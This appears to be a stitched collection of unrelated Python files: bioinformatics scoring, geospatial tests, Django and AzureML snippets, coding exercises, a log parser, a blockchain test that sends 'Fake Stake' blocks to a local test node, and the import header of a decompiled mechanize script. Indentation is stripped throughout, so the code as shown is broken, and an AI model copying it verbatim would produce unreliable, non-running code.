elif len(line)==10:
h_score=hy_xgb_10.predict_proba(np.array(hydro_vector(line)).reshape((1,10)))[:,1][0]
hydrophobicity_score.append(h_score)
R=calculate_R(line,iedb_seq)
Recognition_score.append(R)
elif len(line)==11:
h_score=hy_xgb_11.predict_proba(np.array(hydro_vector(line)).reshape((1,11)))[:,1][0]
hydrophobicity_score.append(h_score)
R=calculate_R(line,iedb_seq)
Recognition_score.append(R)
else:
print "Oh no!!"
print line
print len(line)
hydrophobicity_score.append(0.5)
R=calculate_R(line,iedb_seq)
Recognition_score.append(R)
paired_similarity_score=[]
homolog_similaity_score=[]
#####paired similarity and homolog similarity########
for M_P,N_P,H_P in zip(data_neo.MT_pep,data_neo.WT_pep,Homolog_pep):
print M_P,N_P,H_P
paired_s=cal_similarity_per(M_P,N_P)
homolog_s=cal_similarity_per(M_P,H_P)
paired_similarity_score.append(paired_s)
homolog_similaity_score.append(homolog_s)
self_sequence_similarity=[]
for i in range(len(paired_similarity_score)):
if paired_similarity_score[i] >= homolog_similaity_score[i]:
sss=paired_similarity_score[i]
else:
sss=homolog_similaity_score[i]
self_sequence_similarity.append(sss)
data_neo["Homolog_pep"]=Homolog_pep
data_neo["Homolog_Binding_EL"]=Homolog_EL
data_neo["Recognition_score"]=Recognition_score
data_neo["Hydrophobicity_score"]=hydrophobicity_score
data_neo["Self_sequence_similarity"]=self_sequence_similarity
data_neo["MT_Binding_EL"]=MT_peptide_EL
data_neo["WT_Binding_EL"]=WT_peptide_EL
df_neo=data_neo.loc[:,['Hydrophobicity_score','Recognition_score','Self_sequence_similarity','MT_Binding_EL','WT_Binding_EL']]
data_train = pd.read_table(model_train_file,header=0,sep='\t')
data_train_dropna=data_train.dropna()
target = 'response'
HPcol = 'hydrophobicity_score'
Rcol = 'Recognition_score'
SScol = 'self_sequence_similarity'
ELcol = 'EL_dissimilarity'
predictors = [x for x in data_train_dropna.columns if x not in [target,'Pep_len',ELcol,'EL_ht_rank']]
X_train=data_train_dropna[predictors].values
X_train_scale = StandardScaler().fit_transform(X_train)
y_train=data_train_dropna[target].values
print 'Original dataset shape {}'.format(Counter(y_train))
sm=SMOTE(k_neighbors=4,kind='borderline1',random_state=42)
X_res, y_res = sm.fit_sample(X_train,y_train)
print 'Resampled dataset shape {}'.format(Counter(y_res))
rf0 = RandomForestClassifier(oob_score=True, random_state=10)
print rf0
rf0.fit(X_res, y_res)
dneo_predprob = rf0.predict_proba(df_neo.values)[:,1]
print dneo_predprob
data_neo["model_pro"]=dneo_predprob
data_neo_out_sort=data_neo.sort_values(['model_pro'],ascending=[0])
data_neo_out_sort.to_csv(neo_model_file,sep='\t',header=1,index=0)
neoantigen_infor = []
for i in range(len(data_neo.Gene)):
neo_infor = data_neo["Gene"][i]+'_'+data_neo["AA_change"][i]+'_'+data_neo["MT_pep"][i]+'_'+data_neo["WT_pep"][i]
neoantigen_infor.append(neo_infor)
data_neo["neoantigen_infor"] = neoantigen_infor
f_EL_rank_wt=lambda x:1-(1/(1+math.pow(math.e,5*(float(x)-2))))/2
f_EL_rank_mt=lambda x:1/(1+math.pow(math.e,5*(float(x)-2)))
EL_mt_rank_score=data_neo.MT_Binding_EL.apply(f_EL_rank_mt)
EL_wt_rank_score=data_neo.WT_Binding_EL.apply(f_EL_rank_wt)
bioactive_score=[data_neo.Hydrophobicity_score[i]*data_neo.Recognition_score[i]*data_neo.Self_sequence_similarity[i]*EL_mt_rank_score[i]*EL_wt_rank_score[i] for i in range(len(data_neo.MT_Binding_EL))]
data_neo["bioactive_score"]=bioactive_score
data_neo_sortedby_bioactive=data_neo.sort_values(["bioactive_score"],ascending=False)
data_neo_sortedby_bioactive.to_csv(immunogenicity_bioactive_score_ranking,header=1,index=0,sep='\t')
k=1
f_TPM=lambda x:math.tanh(x/k)
allele_frequency_score=data_neo.variant_allele_frequency
netchop_score=data_neo.combined_prediction_score
try:
tpm_score=data_neo.tpm.apply(f_TPM)
immuno_effect_score=[tpm_score[i]*allele_frequency_score[i]*netchop_score[i]*data_neo.Hydrophobicity_score[i]*data_neo.Recognition_score[i]*data_neo.Self_sequence_similarity[i]*EL_mt_rank_score[i]*EL_wt_rank_score[i] for i in range(len(data_neo.MT_Binding_EL))]
data_feature_select=pd.DataFrame()
data_feature_select["neoantigen_infor"]=neoantigen_infor
data_feature_select["EL_mt_rank_score"]=EL_mt_rank_score
data_feature_select["EL_wt_rank_score"]=EL_wt_rank_score
data_feature_select["tpm_score"]=tpm_score
#data_feature_select["tpm_normal_score"]=tpm_normal_score
data_feature_select["allele_frequency_score"]=allele_frequency_score
data_feature_select["netchop_score"]=netchop_score
data_feature_select["hydrophobicity_score"]=data_neo.Hydrophobicity_score
data_feature_select["Recogonition"]=data_neo.Recognition_score
data_feature_select["Self_sequence_similarity"]=data_neo.Self_sequence_similarity
data_feature_select["immuno_effect_score"]=immuno_effect_score
X_neo = data_feature_select.values[:,1:9]
####pca on non-standardized data of all 6 feature
pca = PCA(n_components=2).fit(X_neo)
X_neo_pca = pca.transform(X_neo)
#print "PCA result on non-standardized data"
#print "explained_variance_ratio",pca.explained_variance_ratio_
#print "explained_variance",pca.explained_variance_
#print pca.n_components_
#print pca.components_
###plot GMM ellipse
# Fit a Gaussian mixture with EM using five components
gmm = mixture.GaussianMixture(n_components=2, covariance_type='full',n_init=5).fit(X_neo_pca)
plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covariances_, 0,'Gaussian Mixture',gmm_classification_file)
#plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covars_, 0, 'Gaussian Mixture')
predict_label=gmm.predict(X_neo_pca)
predict_prob=gmm.predict_proba(X_neo_pca)
predict_positive_prob=[]
for i in range(len(predict_prob)):
pos_prob=predict_prob[i][1]
predict_positive_prob.append(pos_prob)
data_feature_select["gmm_label"]=predict_label
data_gmm_filter_1=data_feature_select[data_feature_select["gmm_label"]==1]
data_gmm_filter_1_scoreAve=data_gmm_filter_1.immuno_effect_score.sum()/len(data_gmm_filter_1.immuno_effect_score)
data_gmm_filter_0=data_feature_select[data_feature_select["gmm_label"]==0]
data_gmm_filter_0_scoreAve=data_gmm_filter_0.immuno_effect_score.sum()/len(data_gmm_filter_0.immuno_effect_score)
if data_gmm_filter_0_scoreAve > data_gmm_filter_1_scoreAve:
data_gmm_filter_0.gmm_label=1
data_gmm_filter_1.gmm_label=0
else:
pass
data_labeled=pd.concat([data_gmm_filter_1,data_gmm_filter_0])
data_label_sorted=data_labeled.sort_values(["immuno_effect_score"],ascending=False)
data_label_sorted.to_csv(immunogenicity_gmm_all_score_ranking,header=1,index=0,sep='\t')
data_gmm_positive=data_label_sorted[data_label_sorted["gmm_label"]==1]
data_gmm_positive.to_csv(immunogenicity_gmm_pos_score_ranking,header=1,index=0,sep='\t')
except AttributeError,e:
print e
immuno_effect_score=[allele_frequency_score[i]*netchop_score[i]*data_neo.Hydrophobicity_score[i]*data_neo.Recognition_score[i]*data_neo.Self_sequence_similarity[i]*EL_mt_rank_score[i]*EL_wt_rank_score[i] for i in range(len(data_neo.MT_Binding_EL))]
data_feature_select=pd.DataFrame()
data_feature_select["neoantigen_infor"]=neoantigen_infor
data_feature_select["EL_mt_rank_score"]=EL_mt_rank_score
data_feature_select["EL_wt_rank_score"]=EL_wt_rank_score
data_feature_select["allele_frequency_score"]=allele_frequency_score
data_feature_select["netchop_score"]=netchop_score
data_feature_select["hydrophobicity_score"]=data_neo.Hydrophobicity_score
data_feature_select["Recogonition"]=data_neo.Recognition_score
data_feature_select["Self_sequence_similarity"]=data_neo.Self_sequence_similarity
data_feature_select["immuno_effect_score"]=immuno_effect_score
X_neo = data_feature_select.values[:,1:8]
####pca on non-standardized data of all 6 feature
pca = PCA(n_components=2).fit(X_neo)
X_neo_pca = pca.transform(X_neo)
#print "PCA result on non-standardized data"
#print "explained_variance_ratio",pca.explained_variance_ratio_
#print "explained_variance",pca.explained_variance_
#print pca.n_components_
#print pca.components_
###plot GMM ellipse
# Fit a Gaussian mixture with EM using five components
gmm = mixture.GaussianMixture(n_components=2, covariance_type='full',n_init=5).fit(X_neo_pca)
plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covariances_, 0,'Gaussian Mixture',gmm_classification_file)
#plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covars_, 0, 'Gaussian Mixture')
predict_label=gmm.predict(X_neo_pca)
predict_prob=gmm.predict_proba(X_neo_pca)
predict_positive_prob=[]
for i in range(len(predict_prob)):
pos_prob=predict_prob[i][1]
predict_positive_prob.append(pos_prob)
data_feature_select["gmm_label"]=predict_label
data_gmm_filter_1=data_feature_select[data_feature_select["gmm_label"]==1]
data_gmm_filter_1_scoreAve=data_gmm_filter_1.immuno_effect_score.sum()/len(data_gmm_filter_1.immuno_effect_score)
data_gmm_filter_0=data_feature_select[data_feature_select["gmm_label"]==0]
data_gmm_filter_0_scoreAve=data_gmm_filter_0.immuno_effect_score.sum()/len(data_gmm_filter_0.immuno_effect_score)
if data_gmm_filter_0_scoreAve > data_gmm_filter_1_scoreAve:
data_gmm_filter_0.gmm_label=1
data_gmm_filter_1.gmm_label=0
else:
pass
data_labeled=pd.concat([data_gmm_filter_1,data_gmm_filter_0])
data_label_sorted=data_labeled.sort_values(["immuno_effect_score"],ascending=False)
data_label_sorted.to_csv(immunogenicity_gmm_all_score_ranking,header=1,index=0,sep='\t')
data_gmm_positive=data_label_sorted[data_label_sorted["gmm_label"]==1]
data_gmm_positive.to_csv(immunogenicity_gmm_pos_score_ranking,header=1,index=0,sep='\t') |
import os
import pytest
from shapely.geometry import Point, Polygon
import geopandas as gp
from osmox import config, build, helpers
fixtures_root = os.path.abspath(
os.path.join(os.path.dirname(__file__), "fixtures")
)
toy_osm_path = os.path.join(fixtures_root, "toy.osm")
park_osm_path = os.path.join(fixtures_root, "park.osm")
test_osm_path = os.path.join(fixtures_root, "toy_selection.osm")
test_config_path = os.path.join(fixtures_root, "test_config.json")
leisure_config_path = os.path.join(fixtures_root, "test_config_leisure.json")
@pytest.fixture()
def test_config():
return config.load(test_config_path)
def test_innit(test_config):
assert build.ObjectHandler(test_config)
@pytest.fixture()
def testHandler(test_config):
return build.ObjectHandler(test_config, crs='epsg:4326')
def test_object_assign_points():
building = build.Object(
idx="XL",
osm_tags={"building":"yes"},
activity_tags=[],
geom=Polygon([(-5, -5), (-5, 5), (5, 5), (5, -5), (-5, -5)])
)
tree = helpers.AutoTree()
tree.auto_insert(
build.OSMObject(
idx=0,
activity_tags=[build.OSMTag(key="a", value="a")],
geom=Point((0, 0))
)
)
tree.auto_insert(
build.OSMObject(
idx=0,
activity_tags=[build.OSMTag(key="b", value="b")],
geom=Point((10, 10))
)
)
tree.auto_insert(
build.OSMObject(
idx=0,
activity_tags=[
build.OSMTag(key="c", value="c"),
build.OSMTag(key="d", value="d")
],
geom=Point((1, -1))
)
)
assert building.assign_points(tree)
assert building.activity_tags == [
build.OSMTag(key='a', value='a'),
build.OSMTag(key='c', value='c'),
build.OSMTag(key='d', value='d')
]
def test_object_assign_areas():
building = build.Object(
idx="XL",
osm_tags={"building":"yes"},
activity_tags=[],
geom=Polygon([(-5, -5), (-5, 5), (5, 5), (5, -5), (-5, -5)])
)
tree = helpers.AutoTree()
tree.auto_insert(
build.OSMObject(
idx=0,
activity_tags=[build.OSMTag(key="a", value="a")],
geom=Polygon([(-5, -5), (-5, 5), (5, 5), (5, -5), (-5, -5)])
)
)
tree.auto_insert(
build.OSMObject(
idx=0,
activity_tags=[build.OSMTag(key="b", value="b")],
geom=Polygon([(10, 10), (10, 25), (25, 25), (25, 10), (10, 10)])
)
)
tree.auto_insert(
build.OSMObject(
idx=0,
activity_tags=[
build.OSMTag(key="c", value="c"),
build.OSMTag(key="d", value="d")
],
geom=Polygon([(-50, -50), (-50, 50), (50, 50), (50, -50), (-50, -50)])
)
)
assert building.assign_points(tree)
assert building.activity_tags == [
build.OSMTag(key='a', value='a'),
build.OSMTag(key='c', value='c'),
build.OSMTag(key='d', value='d')
]
def test_load_toy(testHandler):
handler = testHandler
handler.apply_file(toy_osm_path, locations=True, idx='flex_mem')
assert len(handler.objects) == 5
assert len(handler.points) == 6
assert len(handler.areas) == 3
@pytest.fixture()
def test_leisure_config():
return config.load(leisure_config_path)
@pytest.fixture()
def leisureHandler(test_leisure_config):
return build.ObjectHandler(test_leisure_config, crs='epsg:4326', lazy=False)
def test_leisure_handler(leisureHandler):
handler = leisureHandler
handler.apply_file(park_osm_path, locations=True, idx='flex_mem')
handler.assign_tags()
handler.assign_activities()
df = handler.geodataframe(single_use=True)
assert "leisure" in set(df.activity)
def test_activities_from_area_intersection(testHandler):
testHandler.add_object(
idx=0,
activity_tags=[["test_tag","test_value"]],
osm_tags=[["test","test"]],
geom=Polygon([(0, 0), (0, 10), (10, 10), (10, 0), (0, 0)])
)
testHandler.add_object(
idx=0,
activity_tags=[["test_tag","test_value"]],
osm_tags=[["test","test"]],
geom=Point((1, 1))
)
testHandler.add_object(
idx=0,
activity_tags=[["test_tag","test_value"]],
osm_tags=[["test","test"]],
geom=Point((100, 100))
)
for o, acts in zip(testHandler.objects, [["a"], ["b", "c"], ["d"]]):
o.activities = acts
acts = testHandler.activities_from_area_intersection(Polygon([(0, 0), (0, 50), (50, 50), (50, 0), (0, 0)]))
assert acts == set(["a", "b", "c"])
def test_required_activities_in_target(testHandler):
testHandler.add_object(
idx=0,
activity_tags=[["test_tag","test_value"]],
osm_tags=[["test","test"]],
geom=Polygon([(0, 0), (0, 10), (10, 10), (10, 0), (0, 0)])
)
testHandler.add_object(
idx=0,
activity_tags=[["test_tag","test_value"]],
osm_tags=[["test","test"]],
geom=Point((1, 1))
)
testHandler.add_object(
idx=0,
activity_tags=[["test_tag","test_value"]],
osm_tags=[["test","test"]],
geom=Point((100, 100))
)
for o, acts in zip(testHandler.objects, [["a"], ["b", "c"], ["d"]]):
o.activities = acts
assert testHandler.required_activities_in_target(
required_activities=["a"],
target=Polygon([(0, 0), (0, 50), (50, 50), (50, 0), (0, 0)])
)
assert testHandler.required_activities_in_target(
required_activities=["b", "d"],
target=Polygon([(0, 0), (0, 50), (50, 50), (50, 0), (0, 0)])
)
assert not testHandler.required_activities_in_target(
required_activities=["d"],
target=Polygon([(0, 0), (0, 50), (50, 50), (50, 0), (0, 0)])
)
def test_fill_missing_activities_single_building(testHandler):
testHandler.add_object(
idx=0,
activity_tags=[["test_tag","test_value"]],
osm_tags=[["test","test"]],
geom=Polygon([(0, 0), (0, 10), (10, 10), (10, 0), (0, 0)])
)
testHandler.add_object(
idx=0,
activity_tags=[["test_tag","test_value"]],
osm_tags=[["test","test"]],
geom=Point((1, 1))
)
testHandler.add_object( # not in area
idx=0,
activity_tags=[["test_tag","test_value"]],
osm_tags=[["test","test"]],
geom=Point((110, 110))
)
testHandler.add_area(
idx=0,
activity_tags=[["landuse","residential"]],
geom=Polygon([(0, 0), (0, 100), (100, 100), (100, 0), (0, 0)])
)
for o, acts in zip(testHandler.objects, [["a"], ["b", "c"], ["d"]]):
o.activities = acts
testHandler.fill_missing_activities(
area_tags=[("landuse", "residential")],
required_acts=["d"],
new_tags=[("building", "house")],
size=(10, 10), spacing=(101, 101)
)
objects = [o for o in testHandler.objects]
house = objects[-1]
assert house.idx == "fill_0"
assert house.geom.equals(Polygon([(0, 0), (0, 10), (10, 10), (10, 0), (0, 0)]))
def test_fill_missing_activities_multiple_buildings(testHandler):
testHandler.add_object(
idx=0,
activity_tags=[["test_tag","test_value"]],
osm_tags=[["test","test"]],
geom=Polygon([(0, 0), (0, 10), (10, 10), (10, 0), (0, 0)])
)
testHandler.add_object(
idx=0,
activity_tags=[["test_tag","test_value"]],
osm_tags=[["test","test"]],
geom=Point((1, 1))
)
testHandler.add_object( # not in area
idx=0,
activity_tags=[["test_tag","test_value"]],
osm_tags=[["test","test"]],
geom=Point((110, 110))
)
testHandler.add_area(
idx=0,
activity_tags=[["landuse","residential"]],
geom=Polygon([(0, 0), (0, 100), (100, 100), (100, 0), (0, 0)])
)
for o, acts in zip(testHandler.objects, [["a"], ["b", "c"], ["d"]]):
o.activities = acts
testHandler.fill_missing_activities(
area_tags=[("landuse", "residential")],
required_acts=["d"],
new_tags=[("building", "house")],
size=(10, 10), spacing=(100, 100)
)
objects = [o for o in testHandler.objects]
house = objects[-4]
assert house.idx == "fill_0"
assert house.geom.equals(Polygon([(0, 0), (0, 10), (10, 10), (10, 0), (0, 0)]))
house = objects[-1]
assert house.idx == "fill_3"
assert house.geom.equals(Polygon([(100.0, 100.0), (110.0, 100.0), (110.0, 110.0), (100.0, 110.0), (100.0, 100.0)]))
def test_extract_multiuse_object_geodataframe(testHandler):
testHandler.add_object(
idx=0,
activity_tags=[['a', 'b']],
osm_tags=[['a', 'b']],
geom=Polygon([(-5, -5), (-5, 5), (5, 5), (5, -5), (-5, -5)])
)
testHandler.objects.objects[0].activities = ["a","b"]
testHandler.objects.objects[0].features = {"feature":0}
gdf = testHandler.geodataframe()
assert len(gdf) == 1
obj = gdf.iloc[0].to_dict()
assert obj['activities'] == "a,b"
assert obj["geometry"] == Point(0,0)
assert obj["id"] == 0
assert obj["feature"] == 0
def test_extract_single_use_object_geodataframe(testHandler):
testHandler.add_object(
idx=0,
activity_tags=[['a', 'b']],
osm_tags=[['a', 'b']],
geom=Polygon([(-5, -5), (-5, 5), (5, 5), (5, -5), (-5, -5)])
)
testHandler.objects.objects[0].activities = ["a","b"]
testHandler.objects.objects[0].features = {"feature":0}
gdf = testHandler.geodataframe(single_use=True)
assert len(gdf) == 2
gdf.iloc[0].to_dict()["activity"] == "a"
gdf.iloc[1].to_dict()["activity"] == "b"
for i in range(2):
obj = gdf.iloc[i].to_dict()
assert obj["geometry"] == Point(0,0)
assert obj["id"] == 0
assert obj["feature"] == 0
|
__title__ = "playground"
__author__ = "murlux"
__copyright__ = "Copyright 2019, " + __author__
__credits__ = (__author__, )
__license__ = "MIT"
__email__ = "murlux@protonmail.com"
from logging import Logger
from typing import Any, Dict
from playground.abstract import Integrator
from playground.util import setup_logger
from playground.warehouse.config import WarehouseConfig
from playground.warehouse.persistence import Warehouse
from playground.warehouse.worker import WarehouseWorker
from playground.warehouse.api import WarehouseAPI
class WarehouseIntegrator(Integrator):
"""
Main warehouse class, spawns the Warehouse, the WarehouseWorker and the WarehouseAPI.
These two classes are responsable for maintaining and providing up to date datasets.
"""
logger: Logger = None
# Critical objects
warehouse: Warehouse = None
worker: WarehouseWorker = None
api: WarehouseAPI = None
def __init__(self, config: WarehouseConfig) -> None:
"""Initialize the warehouse's integrator."""
if config is None:
super().__init__(
name="WarehouseIntegrator",
module_name="warehouse",
)
else:
super().__init__(
name=config.get("name", None),
module_name=config.get("module_name", None),
)
self.warehouse = Warehouse()
self.worker = WarehouseWorker(warehouse=self.warehouse)
self.api = WarehouseAPI(warehouse=self.warehouse)
def run(self) -> None:
"""
Starts the warehouse worker and serves warehouse API.
"""
# Start the thread that will serve the HTTP Server
self.api.Start()
# Start the thread that will perform the Warehouse upkeep
self.worker.Start()
# Start the thread that will launch the socket
#self.socket.Start() |
from django.contrib import admin
from .models import Bookmark
# Register your models here.
admin.site.register(Bookmark)
|
import argparse
import cntk as C
import numpy as np
from azureml.core.run import Run
parser = argparse.ArgumentParser()
parser.add_argument('--data-folder', type=str, dest='data_folder', default='./')
args = parser.parse_args()
run = Run.get_context()
run.log('cntk', C.__version__)
run.log('numpy', np.__version__)
run.log('data-folder', args.data_folder) |
#!/usr/bin/env python3
# Copyright (c) 2019 The NRDI developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Covers the scenario of a valid PoS block where the coinstake input prevout is spent on main chain,
but not on the fork branch. These blocks must be accepted.
'''
from time import sleep
from fake_stake.base_test import NRDI_FakeStakeTest
class PoSFakeStakeAccepted(NRDI_FakeStakeTest):
def run_test(self):
self.description = "Covers the scenario of a valid PoS block where the coinstake input prevout is spent on main chain, but not on the fork branch. These blocks must be accepted."
self.init_test()
INITAL_MINED_BLOCKS = 200 # First mined blocks (rewards collected to spend)
FORK_DEPTH = 50 # number of blocks after INITIAL_MINED_BLOCKS before the coins are spent
MORE_MINED_BLOCKS = 10 # number of blocks after spending of the collected coins
self.NUM_BLOCKS = 3 # Number of spammed blocks
# 1) Starting mining blocks
self.log.info("Mining %d blocks.." % INITAL_MINED_BLOCKS)
self.node.generate(INITAL_MINED_BLOCKS)
# 2) Collect the possible prevouts
self.log.info("Collecting all unspent coins which we generated from mining...")
staking_utxo_list = self.node.listunspent()
sleep(2)
# 3) Mine more blocks
self.log.info("Mining %d more blocks.." % (FORK_DEPTH+1))
self.node.generate(FORK_DEPTH+1)
sleep(2)
# 4) Spend the coins collected in 2 (mined in the first 100 blocks)
self.log.info("Spending the coins mined in the first %d blocks..." % INITAL_MINED_BLOCKS)
tx_hashes = self.spend_utxos(staking_utxo_list)
self.log.info("Spent %d transactions" % len(tx_hashes))
sleep(2)
# 5) Mine 10 more blocks
self.log.info("Mining %d more blocks to include the TXs in chain..." % MORE_MINED_BLOCKS)
self.node.generate(MORE_MINED_BLOCKS)
sleep(2)
# 6) Create "Fake Stake" blocks and send them
self.log.info("Creating Fake stake blocks")
err_msgs = self.test_spam("Fork", staking_utxo_list, fRandomHeight=True, randomRange=FORK_DEPTH, randomRange2=MORE_MINED_BLOCKS-2, fMustPass=True)
if not len(err_msgs) == 0:
self.log.error("result: " + " | ".join(err_msgs))
raise AssertionError("TEST FAILED")
self.log.info("%s PASSED" % self.__class__.__name__)
if __name__ == '__main__':
PoSFakeStakeAccepted().main()
|
import m.common as common
class StatementBase(common.HelpClass):
def __init__(self):
pass
def dump(self, fh):
pass
def dumplog(self, log, context=""):
log.info("%sStatement %s", context, self.__class__.__name__)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-03 11:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='DataSchema',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='DataSchemaConstraints',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('unique', models.BooleanField(default=False, verbose_name='Values in this row have to be unique')),
('format', models.CharField(blank=True, max_length=100, verbose_name='Define a format (only for Date/Time/DateTime)')),
('minimum', models.CharField(blank=True, max_length=100, verbose_name='(optional) Define a minimum value (only for Number/Date/Time/DateTime) ')),
('maximum', models.CharField(blank=True, max_length=100, verbose_name='(optional) Define a maximum value')),
('required', models.BooleanField(default=False, verbose_name='Field is required')),
('min_length', models.IntegerField(null=True)),
('max_length', models.IntegerField(null=True)),
],
),
migrations.CreateModel(
name='DataSchemaField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, verbose_name='Name of row')),
('datatype', models.CharField(choices=[('string', 'String'), ('number', 'Number'), ('date', 'Date'), ('time', 'Time'), ('datetime', 'DateTime'), ('year', 'Year'), ('yearmonth', 'Year Month'), ('boolean', 'Boolean'), ('object', 'Object'), ('geopoint', 'GeoPoint'), ('array', 'Array'), ('duration', 'Duration'), ('any', 'Any')], max_length=100)),
('primary_key', models.BooleanField(default=False, verbose_name='Field is a primary key')),
('title', models.CharField(blank=True, max_length=100, verbose_name='Title of field')),
('description', models.TextField(blank=True, verbose_name='Description of the contents of the field')),
('constraints', models.ManyToManyField(to='dataschema_manager.DataSchemaConstraints')),
],
),
migrations.AddField(
model_name='dataschema',
name='fields',
field=models.ManyToManyField(to='dataschema_manager.DataSchemaField'),
),
]
|
from pyopenproject.api_connection.exceptions.request_exception import RequestError
from pyopenproject.api_connection.requests.get_request import GetRequest
from pyopenproject.business.exception.business_error import BusinessError
from pyopenproject.business.services.command.find_list_command import FindListCommand
from pyopenproject.business.services.command.time_entry.time_entry_command import TimeEntryCommand
from pyopenproject.business.util.filters import Filters
from pyopenproject.business.util.url import URL
from pyopenproject.business.util.url_parameter import URLParameter
from pyopenproject.model.time_entry import TimeEntry
class FindAll(TimeEntryCommand):
def __init__(self, connection, filters, sort_by):
super().__init__(connection)
self.filters = filters
self.sort_by = sort_by
def execute(self):
try:
request = GetRequest(self.connection, str(URL(f"{self.CONTEXT}",
[
Filters(
self.filters),
URLParameter("sortBy", self.sort_by)
])))
return FindListCommand(self.connection, request, TimeEntry).execute()
except RequestError as re:
raise BusinessError("Error finding all time entries") from re
|
"""
Programa que leia um numero inteiro qualquer e peça para o usuário escolher qual será a base de conversão
1 - para binário
2 - para octal
3 - para hexadecimal
"""
num = int(input('Digite um numero inteiro: '))
print('''
1 - Converter para BINÁRIO
2 - Converter para OCTAL
3 - Converter para HEXADECIMAL
''')
opcao = int(input('Informe a opção desejada '))
if opcao == 1:
print(f'O número {num} convertido para BINÁRIO é {bin(num)[2:]}')
elif opcao == 2:
print(f'O número {num} convertido para OCTAL é {oct(num)[2:]}')
elif opcao == 3:
print(f'O número {num} convertido para HEXADECIMAL é {hex(num)[2:]}')
else:
print('Opção inválida. Tente novamente')
|
while True:
dados = []
matriz = []
n = int(input())
if n == 0:
break
for linha in range(0, n):
for coluna in range(0, n):
dados.append(0)
matriz.append(dados[:])
dados.clear()
resultado = 1
cima = 0
esquerda = 0
baixo = n - 1
direita = n - 1
if n % 2 == 0:
meio = n / 2
else:
meio = (n + 1) / 2
while resultado <= meio:
temp = esquerda
while temp <= direita:
matriz[cima][temp] = resultado
matriz[baixo][temp] = resultado
temp += 1
temp = (cima + 1)
while temp < baixo:
matriz[temp][esquerda] = resultado
matriz[temp][direita] = resultado
temp += 1
resultado += 1
cima += 1
baixo -= 1
esquerda += 1
direita -= 1
for linha in range(0, len(matriz)):
for coluna in range(0, len(matriz)):
if coluna == 0:
print(f" {matriz[linha][coluna]}", end="")
else:
print(f"{matriz[linha][coluna]:4d}", end="")
print()
print()
|
"""Loads a ggcm log file
Parses the view info """
from __future__ import print_function
import itertools
import re
import numpy as np
from viscid.readers import vfile
# FIXME: This lookup table is based on an enum in ggcm_mhd.h, ie, the numerical
# values (index in this list) could change in the future - but libmrc
# only writes out the integer value for mhd->ggcm_mhd_fld->mhd_type
# into the log file, so a guess is better than nothing...
MHD_TYPES = ["MT_PRIMITIVE",
# the following have B staggered the openggcm way: [-1..mx[
"MT_SEMI_CONSERVATIVE_GGCM",
# the following have B staggered the "normal" way: [0..mx]
"MT_SEMI_CONSERVATIVE",
"MT_FULLY_CONSERVATIVE",
# cell-centered fully conservative MHD
"MT_FULLY_CONSERVATIVE_CC",
# the multi-moment schemes are cell-centered for all quantities
"MT_GKEYLL"]
class GGCMLogFile(vfile.VFile): # pylint: disable=W0223
"""Libmrc log file reader
This class looks at the mrc_view info before the run starts
to gather info about libmrc runtime parameters.
Attributes:
watched_classes (list): list of libmrc classes whose parameters
will be loaded
"""
_detector = None
_grid_type = None
watched_classes = ["ggcm_mhd",
"mrc_domain",
"mrc_crds",
"ggcm_mhd_ic",
"ggcm_dipole",
"ggcm_mhd_step",
"ggcm_mhd_fld"]
info = None
def _parse(self):
_info = {}
armed = False
with open(self.fname, 'r') as f:
# find end of view
def is_timestep(s):
return not s.strip().startswith(('cp=', 'step='))
lines_iter = itertools.takewhile(is_timestep, f)
for line in lines_iter:
line = line.strip()
if armed:
try:
key, val = self._parse_param(line)
_info["{0}_{1}".format(armed, key)] = val
except ValueError:
# this is expected for lines that look like
# "-------+------ type -- ???"
# as well as blank lines that mark the end of a
# section
clstype = re.match(r"-+\+-+ type -- (\w+)", line)
if clstype:
_info["{0}_type".format(armed)] = clstype.group(1)
# yes, keep armed, for super's parameters
elif line == "":
armed = False
else:
try:
c = re.match(r"=+ class == (.+)", line).group(1)
c = c.strip()
if c in self.watched_classes:
armed = c
# the next lines just say
# "parameter | value"
# "-----------|------"
# ignore them
next(lines_iter)
next(lines_iter)
except AttributeError:
# not the start of a new class view, that's ok
pass
try:
mhd_type = _info["ggcm_mhd_fld_mhd_type"]
_info["ggcm_mhd_fld_mhd_type_str"] = MHD_TYPES[mhd_type]
except (IndexError, KeyError):
_info["ggcm_mhd_fld_mhd_type_str"] = "UNKNOWN"
self.info = _info
@staticmethod
def _parse_value(s):
"""Parse a parameter and infer its type
Parameters:
s (str): the value of a libmrc parameter
Returns:
Either an int, float, string, or list of mixed types as
inferred by the data
"""
try:
return int(s)
except ValueError:
pass
try:
return float(s)
except ValueError:
pass
s = s.strip()
if re.match(r"\-?[\d\.]+(\s*,\s*\-?[\d\.]+)+", s):
l = s.split(",")
for i, s in enumerate(l):
try:
l[i] = int(s)
except ValueError:
try:
l[i] = float(s)
except ValueError:
l[i] = s.strip()
return np.array(l)
elif re.match(r"[A-Za-z\d\.\-]+(\s*:\s*[A-Za-z\d\.\-]+)+", s):
return s.split(":")
else:
return s
@classmethod
def _parse_param(cls, s):
"""Parse a libmrc view output line
Parameters:
s (str): full line of a parameter in the view
Raises
ValueError: If there is > 1 '|' character in s
"""
key, val = [part.strip() for part in s.split("|")]
val = cls._parse_value(val)
return key, val
def unload(self, **kwargs):
self.info = {}
super(GGCMLogFile, self).unload(**kwargs)
##
## EOF
##
|
#Decompiled At:Thu Mar 12 20:23:01 2020
import os, sys, time, hashlib, json, requests, mechanize, urllib, cookielib, re
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
